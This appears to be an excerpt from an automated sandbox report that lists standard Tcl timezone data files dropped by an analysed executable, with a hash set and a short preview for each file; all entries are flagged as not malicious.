                                                                                                                                                                                                                              Entropy (8bit):4.887587766811186
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7ZLgXPHAIgpZLgFN/0N290ZLgK:MByMY13p1stx901/
                                                                                                                                                                                                                              MD5:68900CE38FE0E40578323BBD3D75184E
                                                                                                                                                                                                                              SHA1:9D5EAB5CBCD495DD46974207FBE354A81DD2070F
                                                                                                                                                                                                                              SHA-256:5C4FD46054B190A6D4B92585B4DAE4E3A8233EE2996D14472835DDD264911DC6
                                                                                                                                                                                                                              SHA-512:3EF53F0FCD8D88A1B977886BDFAA03D7B84EF021AC6BEDF7C571BFBF2242BFC3F3EB6A6B6A9C2F6852AF412A96DFBC30F3BB25A6619CBCD8736F3DF5B64DE1BF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Vancouver)]} {.. LoadTimeZoneFile America/Vancouver..}..set TZData(:Canada/Pacific) $TZData(:America/Vancouver)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.887593462838566
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0sAzE5Y5XHAIg20sAzEo5RL/0nogS64IAcGEsAzEB:SlSWB9vsM3y7hzi2HAIgphznN/0Hd499
                                                                                                                                                                                                                              MD5:A4237BDCAF68B0EFECA97178F3DEE724
                                                                                                                                                                                                                              SHA1:A9CBC02B5545A63A0C9B38C8FA7FA2DE6D483188
                                                                                                                                                                                                                              SHA-256:46BA00AE3A07A4DC83D6CB517D87C9CBBA491B3421FE9AD6C74CAC5695EB73F7
                                                                                                                                                                                                                              SHA-512:832BF256BE8CB2DD205DDE50017448D5830B46FF4DCA77BDB852067EE0C9DF9977014F2A3E3DD6944336158D8EA377CFBBE519EE5B56FB26EB64325B45476B9D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Regina)]} {.. LoadTimeZoneFile America/Regina..}..set TZData(:Canada/Saskatchewan) $TZData(:America/Regina)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):195
                                                                                                                                                                                                                              Entropy (8bit):4.889486451014262
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7peR2fkSHAIgppeR2rN/0CF/490peR24:MByMYkGk7pkOtBQ90kB
                                                                                                                                                                                                                              MD5:490D99BD5465CBF5A8FE28F33180B8A6
                                                                                                                                                                                                                              SHA1:4783295C31A804BE98145270ED28956A0783E655
                                                                                                                                                                                                                              SHA-256:A1B1AF37DC89C6BA663E4E967A18409AE4E0FA9EF1B908D0461368DA31001C09
                                                                                                                                                                                                                              SHA-512:9F6B4F204A21B69E1DFCB766C0671D3736414C73269DCEDCDB4FC3DBA869BBA1511DF6B5061F8964F0AF9C3816133D04E5DFB8A6AD07CA06E7712787A8FECC5A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Whitehorse)]} {.. LoadTimeZoneFile America/Whitehorse..}..set TZData(:Canada/Yukon) $TZData(:America/Whitehorse)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):194
                                                                                                                                                                                                                              Entropy (8bit):4.812019117774239
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7tfEJkHAIgptfEJo5N/0rHM490tfEJB:MByMYE9pEOt4X90EB
                                                                                                                                                                                                                              MD5:6EF54792279C249B16877100682F1806
                                                                                                                                                                                                                              SHA1:A62629EA055207D917740E3AEF4F0B005EA49CC4
                                                                                                                                                                                                                              SHA-256:5B40167DD0C0B5C293861070C4AC249F78DDF8BAD798DD0165E3AE894C9B9570
                                                                                                                                                                                                                              SHA-512:3CF93003C3EA2B4386660F0C87074F9AE2BAC4EE72D88451DCB1EA8B79502D2187B1608B6D5CE8D7EDC00AED99CF9DB7B006EB6ED2A2B5009F2C0E757D282D74
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Santiago)]} {.. LoadTimeZoneFile America/Santiago..}..set TZData(:Chile/Continental) $TZData(:America/Santiago)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.808907056781067
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG7ZAJWXHAIgObT7ZAiFvRL/0bxOdBx/nUDH7ZAZv:SlSWB9vsM3ycJAUHAIgObJAiRN/04dBn
                                                                                                                                                                                                                              MD5:2EC4FDD1EFBAF1D9F9DBAC8B1B5EDD09
                                                                                                                                                                                                                              SHA1:FECED8EBC7B666628B7B45C9694FCB3A0B20A42A
                                                                                                                                                                                                                              SHA-256:1E2DA1862E0E0F131B7C6EB12FAC5F920852C61C162993A30BC843A464A5AAD4
                                                                                                                                                                                                                              SHA-512:74D61141505BAF1ABAD61FB91941C63C169EFE3C85829FEBB4D29A72EA54D1A07EC84E2E9B48E963E65CBF7663245459FAD288D620B1BEFFE682A2D1C243794D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Easter)]} {.. LoadTimeZoneFile Pacific/Easter..}..set TZData(:Chile/EasterIsland) $TZData(:Pacific/Easter)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):175
                                                                                                                                                                                                                              Entropy (8bit):4.857134440822812
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx02TEMVFfXHAIg202TEyRRL/0lIAcGE2TEMy:SlSWB9vsM3y76EkHAIgp6EyRN/0l9068
                                                                                                                                                                                                                              MD5:3FB16EA4A9B0529220133C4A7B05215B
                                                                                                                                                                                                                              SHA1:BD56B6E76A92A5925140CB5CC3D940E1DE90993F
                                                                                                                                                                                                                              SHA-256:6F4F2D7F5BCA4E5183460C0153D2B98F5239A99F149DE6638B311C73CEDB1329
                                                                                                                                                                                                                              SHA-512:690EC1BCE7FA979BD55725B8ED6DF042BB331CAD332827B2C64B31F107539934AA5A30268B1F03D52697528E68A1BA72E4D56B5199A68B1ED897B75FAFB33A8A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Havana)]} {.. LoadTimeZoneFile America/Havana..}..set TZData(:Cuba) $TZData(:America/Havana)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7440
                                                                                                                                                                                                                              Entropy (8bit):3.695300167191082
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:CgDIMcVbf+uO7DVopaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlt:KlfyDjivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:34339D40AC889DCB5A09D10F123175AD
                                                                                                                                                                                                                              SHA1:57E1F70FA8999106FA3874A9CE1E75A7ACBC81E9
                                                                                                                                                                                                                              SHA-256:64E284F9F7A36CC0A352809141D76E73A99344A9F30CFFEA254CBB9D2C589ADA
                                                                                                                                                                                                                              SHA-512:2DCF16D9D7593FC3E5844E18FD689AADA157866490CFD37A38A47F747DDA189822055F6DD470CA2D77040D2C5A2527512880C22ED8EC16D9424EDF3DC228AFED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:EET) {.. {-9223372036854775808 7200 0 EET}.. {228877200 10800 1 EEST}.. {243997200 7200 0 EET}.. {260326800 10800 1 EEST}.. {276051600 7200 0 EET}.. {291776400 10800 1 EEST}.. {307501200 7200 0 EET}.. {323830800 10800 1 EEST}.. {338950800 7200 0 EET}.. {354675600 10800 1 EEST}.. {370400400 7200 0 EET}.. {386125200 10800 1 EEST}.. {401850000 7200 0 EET}.. {417574800 10800 1 EEST}.. {433299600 7200 0 EET}.. {449024400 10800 1 EEST}.. {465354000 7200 0 EET}.. {481078800 10800 1 EEST}.. {496803600 7200 0 EET}.. {512528400 10800 1 EEST}.. {528253200 7200 0 EET}.. {543978000 10800 1 EEST}.. {559702800 7200 0 EET}.. {575427600 10800 1 EEST}.. {591152400 7200 0 EET}.. {606877200 10800 1 EEST}.. {622602000 7200 0 EET}.. {638326800 10800 1 EEST}.. {654656400 7200 0 EET}.. {670381200 10800 1 EEST}.. {686106000 7200 0 EET}.. {701830800 10800 1 E
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):111
                                                                                                                                                                                                                              Entropy (8bit):4.924838898127838
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yLbNMXGm2OHLVva0v:SlSWB9eg/ylDm2OHLVi0v
                                                                                                                                                                                                                              MD5:B221E7141FFC9DEA317F64F81C7BB4E0
                                                                                                                                                                                                                              SHA1:B13BBDE790B169D8B9075275523F319D5173E2C7
                                                                                                                                                                                                                              SHA-256:6344BE02529C1CC5F7B5FE14B7E9BBCED4DDE68A24B824601EEBCAE207ABFDF2
                                                                                                                                                                                                                              SHA-512:FFFA733476D6C7DCF49C0B88C9F5E381DE2B69BAEDF6C7B1D91C6F45CE2D36E06D40F25B6BB65D4B5D650471BB52CD2EC3F68703DAB4BD5414F8D3F831D92BD2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:EST) {.. {-9223372036854775808 -18000 0 EST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8505
                                                                                                                                                                                                                              Entropy (8bit):3.8091719283634853
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:R+kNoStCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:RXoSItON0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:4578FE48781599B55F4BCF5560019789
                                                                                                                                                                                                                              SHA1:4EAA7134621DFDEBFD1405F5CC58227FA7E80C3A
                                                                                                                                                                                                                              SHA-256:0BE6161403BC5A96BFAB174F2C3FCBA8A677D4349699B408E9872B9DD0FE15CE
                                                                                                                                                                                                                              SHA-512:9ACC2EF396F635D22E3DF6B785831AD74B510049F1BE85F996467A5BBC0DF49A28B2FC3E4CA0CA9DC8FC2C29EA50D909F0B153265B107445D3052E81D9A4D50A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:EST5EDT) {.. {-9223372036854775808 -18000 0 EST}.. {-1633280400 -14400 1 EDT}.. {-1615140000 -18000 0 EST}.. {-1601830800 -14400 1 EDT}.. {-1583690400 -18000 0 EST}.. {-880218000 -14400 1 EWT}.. {-769395600 -14400 1 EPT}.. {-765396000 -18000 0 EST}.. {-84387600 -14400 1 EDT}.. {-68666400 -18000 0 EST}.. {-52938000 -14400 1 EDT}.. {-37216800 -18000 0 EST}.. {-21488400 -14400 1 EDT}.. {-5767200 -18000 0 EST}.. {9961200 -14400 1 EDT}.. {25682400 -18000 0 EST}.. {41410800 -14400 1 EDT}.. {57736800 -18000 0 EST}.. {73465200 -14400 1 EDT}.. {89186400 -18000 0 EST}.. {104914800 -14400 1 EDT}.. {120636000 -18000 0 EST}.. {126687600 -14400 1 EDT}.. {152085600 -18000 0 EST}.. {162370800 -14400 1 EDT}.. {183535200 -18000 0 EST}.. {199263600 -14400 1 EDT}.. {215589600 -18000 0 EST}.. {230713200 -14400 1 EDT}.. {247039200 -18000 0 EST}.. {262767600
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                              Entropy (8bit):4.862365884559795
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsPHV5XHAIgNGE7TRRL/yCh0DcPHy:SlSWB9vsM3y7fHAIgNTRN/yg0DH
                                                                                                                                                                                                                              MD5:ACD69F34396296BA553243267D06CEE0
                                                                                                                                                                                                                              SHA1:9575FFE5E7833B9532F17AC5413EA9DB23F07ECA
                                                                                                                                                                                                                              SHA-256:936B6484469351DEF8FAFE8EC180862729F5E43BDE4E53E2E9636E221B54C3C2
                                                                                                                                                                                                                              SHA-512:149D23FF35747127E9A2F4056D09472E8E689970BC795D5411C5BF621D949ADDEBDA68674D375A248A63106ABDFF6C54A8AFE5385C45BE2916CAED0C30F7C4A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Cairo)]} {.. LoadTimeZoneFile Africa/Cairo..}..set TZData(:Egypt) $TZData(:Africa/Cairo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):172
                                                                                                                                                                                                                              Entropy (8bit):4.901791318009318
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV5QH+o3vXHAIgoq6QHFRRL/yMQs/h8QanQHuv:SlSWB9vsM3ymnQeoPHAIgonQzN/yM/hm
                                                                                                                                                                                                                              MD5:E9C2C97EB65526F1D4BE1AD7385336FA
                                                                                                                                                                                                                              SHA1:09E4000CE320F779E2DFCA2FFD6B9258FFBA6CE4
                                                                                                                                                                                                                              SHA-256:B78A833337EFEC8B5F64622F1BFDA21FCB79CF290E9CF32A54B206EB20C6FDE9
                                                                                                                                                                                                                              SHA-512:EAEC097B58BF466CC7D6C0C6297628AF910CC308AC822565FD6CDABF96CD4EC57D4CC724FE782B6C1B606DFF9424013F6A890A871339577F7CB68BBB3C425E65
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Dublin)]} {.. LoadTimeZoneFile Europe/Dublin..}..set TZData(:Eire) $TZData(:Europe/Dublin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):110
                                                                                                                                                                                                                              Entropy (8bit):4.928744204623185
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDMbNMXGm2OHvDwy:SlSWB9eg/yRQJDm2OHsy
                                                                                                                                                                                                                              MD5:9C08898081382F52CE681B592B8E2C8D
                                                                                                                                                                                                                              SHA1:165944424740B1FA9B4B3B8E622198ABD0BDA0F8
                                                                                                                                                                                                                              SHA-256:66B0DF8888883BFF44B18728B48CDF24AAED0BB745D601F3422C4F2D4063E0AC
                                                                                                                                                                                                                              SHA-512:86EA639F999169F2FBA2457BE5042463A1938031268CCA71FDD03CCBC6194932937BA58B49FBED461E055E9AA668FF6EBF391AA7EC603C0A425416DF2E6CC84D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT) {.. {-9223372036854775808 0 0 GMT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):159
                                                                                                                                                                                                                              Entropy (8bit):4.910789466104329
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/yRDOm7/8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/yRSw8RQy
                                                                                                                                                                                                                              MD5:333F2BFA92742A49BB88F11C7CD896A9
                                                                                                                                                                                                                              SHA1:BB5BEC010C36427AEEBDDA2FB72083E22A3F5073
                                                                                                                                                                                                                              SHA-256:64466EA3759301E88C29AD1A833CDCBBC495EB4A5A3AC45E7B2987FECD6702BD
                                                                                                                                                                                                                              SHA-512:E2270F4B57C5F1C849726259B886E8644DCF497FA0D034AD48885146BEDC70DC8899900DA9AC01F2609A2DA881E10F9042CCBF75A3F5DA7344D7E92F1B070806
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:Etc/GMT+0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):116
                                                                                                                                                                                                                              Entropy (8bit):4.980500771169276
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOveyXMXGm2OH1VOwVn:SlSWB9eg/yRSvPDm2OH1VOwV
                                                                                                                                                                                                                              MD5:A7C3FD06D1E06F125813C9687C42067C
                                                                                                                                                                                                                              SHA1:515622C0B63E977AFBFC78AD8466053C4A4A71A6
                                                                                                                                                                                                                              SHA-256:3BE1EC71D2CC88FA9A3DB7DC0476475F33FE5BCBE6BC35C0F083859766466C32
                                                                                                                                                                                                                              SHA-512:548DA608CFCA5B8539652F94CA2040D624602D2DF64B2C8CCDB8B219B9B384E01386CDF95F3BF77409DF0584FA12A3B73D56D13107D98BEB4C2555F458B3F374
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+1) {.. {-9223372036854775808 -3600 0 -01}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):118
                                                                                                                                                                                                                              Entropy (8bit):4.965033464829338
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOPFNMXGm2OH1VYU7vV:SlSWB9eg/yRSPXDm2OH1VYW9
                                                                                                                                                                                                                              MD5:FF71149E56D4CB553D0ED949B5F4C122
                                                                                                                                                                                                                              SHA1:3459B47E0EEC80D7A29512CA4F3F236C89E86573
                                                                                                                                                                                                                              SHA-256:E61E826E6FBC2396EF152640698098F4477D4FFDFE5F791F62250C3EC5865304
                                                                                                                                                                                                                              SHA-512:43B0CC8BD7F1EFC80C3F14F115D651EADD5743B17B854C2FB7AC25995138D3DF8792915C2952B80F35784A7115F8FB335ACE171479B24C668190AC175523DB21
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+10) {.. {-9223372036854775808 -36000 0 -10}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):118
                                                                                                                                                                                                                              Entropy (8bit):5.002239901486653
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOeJMXGm2OHaBByVn:SlSWB9eg/yRSsDm2OHa7yV
                                                                                                                                                                                                                              MD5:08AABA917A8D6B3BB3D0DD1637F5ABFC
                                                                                                                                                                                                                              SHA1:D1D704F0250D4CBD450922A02D021E0000FBF5CF
                                                                                                                                                                                                                              SHA-256:143528946275DDC8B894218D3F1BE56C950F740828CEC13166C3D7E8E1B6BB7E
                                                                                                                                                                                                                              SHA-512:F37AE54864A613C830308CB94AB7CEA9534A86A53B52B4A2C28CEEFE6F5BC0518143AAFD77A6DA5EC55D392F5BD34FCD4B5BE51794B1A386ED783B9BA89C10C3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+11) {.. {-9223372036854775808 -39600 0 -11}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):118
                                                                                                                                                                                                                              Entropy (8bit):4.97889339723103
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDONdNMXGm2OH3FNyUFFv:SlSWB9eg/yRSNDm2OH3XyMv
                                                                                                                                                                                                                              MD5:7374B66D6E883D7581E9561C3815EB92
                                                                                                                                                                                                                              SHA1:235E96A7420DF6733F3CA368D4A2D57766656043
                                                                                                                                                                                                                              SHA-256:A93EAFAC2C1089C608C8536127D0E8B53D8C7CFD13AE7DD69339E12A89F803C6
                                                                                                                                                                                                                              SHA-512:9BA59B17F20D65DFF1A5A2D557B535F69B04C172AECB15F88CA3484D74CC7D53894985C08653CF13D868BCBD5E7E5041E0CB2F457B5B603F3851198E552E33A7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+12) {.. {-9223372036854775808 -43200 0 -12}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):116
                                                                                                                                                                                                                              Entropy (8bit):4.922268982357521
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOcF3vFNMXGm2OHnFQVIyV:SlSWB9eg/yRS0fXDm2OHnFQVb
                                                                                                                                                                                                                              MD5:FDDC663E40F8FFFE27959E94625725DF
                                                                                                                                                                                                                              SHA1:EE3FBC1F6C8BBCF1BDC9E5DB4D2EA1A57E2E9BB3
                                                                                                                                                                                                                              SHA-256:AD5833153446960BDE0653A22AE2111BF80CFD61C3010993CE87B81D40C75C72
                                                                                                                                                                                                                              SHA-512:A1B2A153834FEAD7DC27C0918E1B1CB905671F82850C1CAAEBD89F5535703FB259F02F699EA7F82F3044E37668EE93DFA4D4EB862CD437AFF0DABA84867B1963
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+2) {.. {-9223372036854775808 -7200 0 -02}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.949132511023475
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOFfMXGm2OHBFVGAvFv:SlSWB9eg/yRSlDm2OHBFAKV
                                                                                                                                                                                                                              MD5:5C6F16F2CFD46030688066F9BFBE675D
                                                                                                                                                                                                                              SHA1:1DB5F36584822EB92E75B9AC9F440FD671BD90AE
                                                                                                                                                                                                                              SHA-256:C7BEE4C71905EDDB40BAF42C0CD0DC70BB9F298EAAB8B9367D484B8431DD084A
                                                                                                                                                                                                                              SHA-512:FFB2C4CD8EA7DE165C3D989454898FF2023D1A1E3B2B34EC23B1B71EFA7BF2538488DA0069E59F1152B8933D2263B762D2D7C56ADBED826C33FC0BA6672E34DB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+3) {.. {-9223372036854775808 -10800 0 -03}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.971627677226461
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOqJMXGm2OHBvGQy:SlSWB9eg/yRSQDm2OHBON
                                                                                                                                                                                                                              MD5:E35244C1A6084C7BC1D79E437677C55C
                                                                                                                                                                                                                              SHA1:898619DA4B8B9AC72E69C7BD30DEA2ADEF9440FE
                                                                                                                                                                                                                              SHA-256:26D1EF512CC5797FC63BA2B83C7D6271025F4D4F5C904D9FA8E97F053393D9A7
                                                                                                                                                                                                                              SHA-512:0687758558C4C5FF7802F3A57212694A1515761A8337D4B75FFE81434D2AD8A221B005DEC36BF013F2FC3DE1E46DFBED36352811EB7C5A5AE3A167A2E314F57C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+4) {.. {-9223372036854775808 -14400 0 -04}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.956438091983076
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOJNMXGm2OHLVvyV6Aov:SlSWB9eg/yRSDDm2OHLVKVg
                                                                                                                                                                                                                              MD5:7C560A0F3C42E399AC1247CB6C516DC6
                                                                                                                                                                                                                              SHA1:C314B09D4E369C69C23A8DC1FB066FD0CFDC7211
